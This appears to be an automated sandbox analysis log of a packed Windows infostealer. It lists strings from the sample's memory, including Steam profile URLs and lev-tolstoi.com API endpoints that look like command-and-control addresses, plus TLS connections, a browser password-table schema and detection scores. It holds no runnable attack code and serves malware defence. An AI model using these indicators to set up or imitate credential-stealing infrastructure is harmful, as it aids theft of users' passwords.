              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
              Source: k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2283837927.0000000005596000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2284043332.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2261475852.000000000558A000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2355357038.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2260828830.0000000005585000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/$$
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2355357038.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2353494330.0000000005592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
              Source: k7T6akLcAr.exe, 00000000.00000003.2283743192.000000000558A000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2283837927.0000000005596000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2284043332.0000000005592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api3
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api9
              Source: k7T6akLcAr.exe, 00000000.00000003.2388617851.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000002.2392347427.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2355357038.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api?
              Source: k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiFV
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
              Source: k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi;
              Source: k7T6akLcAr.exe, 00000000.00000003.2354242281.0000000000AAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apingNot_NullproductState
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: k7T6akLcAr.exe, 00000000.00000003.2285086260.000000000569F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: k7T6akLcAr.exe, 00000000.00000003.2285086260.000000000569F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: k7T6akLcAr.exe, 00000000.00000003.2307679456.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: k7T6akLcAr.exe, 00000000.00000003.2307679456.00000000055A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: k7T6akLcAr.exe, 00000000.00000003.2285086260.000000000569F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: k7T6akLcAr.exe, 00000000.00000003.2285086260.000000000569F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: k7T6akLcAr.exe, 00000000.00000003.2285086260.000000000569F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49752 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: k7T6akLcAr.exeStatic PE information: section name:
              Source: k7T6akLcAr.exeStatic PE information: section name: .rsrc
              Source: k7T6akLcAr.exeStatic PE information: section name: .idata
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_0559DA030_3_0559DA03
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_0559D1DB0_3_0559D1DB
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_055995D30_3_055995D3
              Source: k7T6akLcAr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: k7T6akLcAr.exeStatic PE information: Section: ZLIB complexity 0.9995532066993464
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: k7T6akLcAr.exe, 00000000.00000003.2237873940.000000000559E000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2261256267.00000000055B4000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237567819.00000000055BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: k7T6akLcAr.exeReversingLabs: Detection: 55%
              Source: k7T6akLcAr.exeVirustotal: Detection: 56%
              Source: k7T6akLcAr.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile read: C:\Users\user\Desktop\k7T6akLcAr.exeJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: k7T6akLcAr.exeStatic file information: File size 2951680 > 1048576
              Source: k7T6akLcAr.exeStatic PE information: Raw size of wxmqvxzx is bigger than: 0x100000 < 0x2a6e00

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeUnpacked PE file: 0.2.k7T6akLcAr.exe.da0000.0.unpack :EW;.rsrc :W;.idata :W;wxmqvxzx:EW;igxirnni:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wxmqvxzx:EW;igxirnni:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: k7T6akLcAr.exeStatic PE information: real checksum: 0x2d7664 should be: 0x2e01db
              Source: k7T6akLcAr.exeStatic PE information: section name:
              Source: k7T6akLcAr.exeStatic PE information: section name: .rsrc
              Source: k7T6akLcAr.exeStatic PE information: section name: .idata
              Source: k7T6akLcAr.exeStatic PE information: section name: wxmqvxzx
              Source: k7T6akLcAr.exeStatic PE information: section name: igxirnni
              Source: k7T6akLcAr.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeCode function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
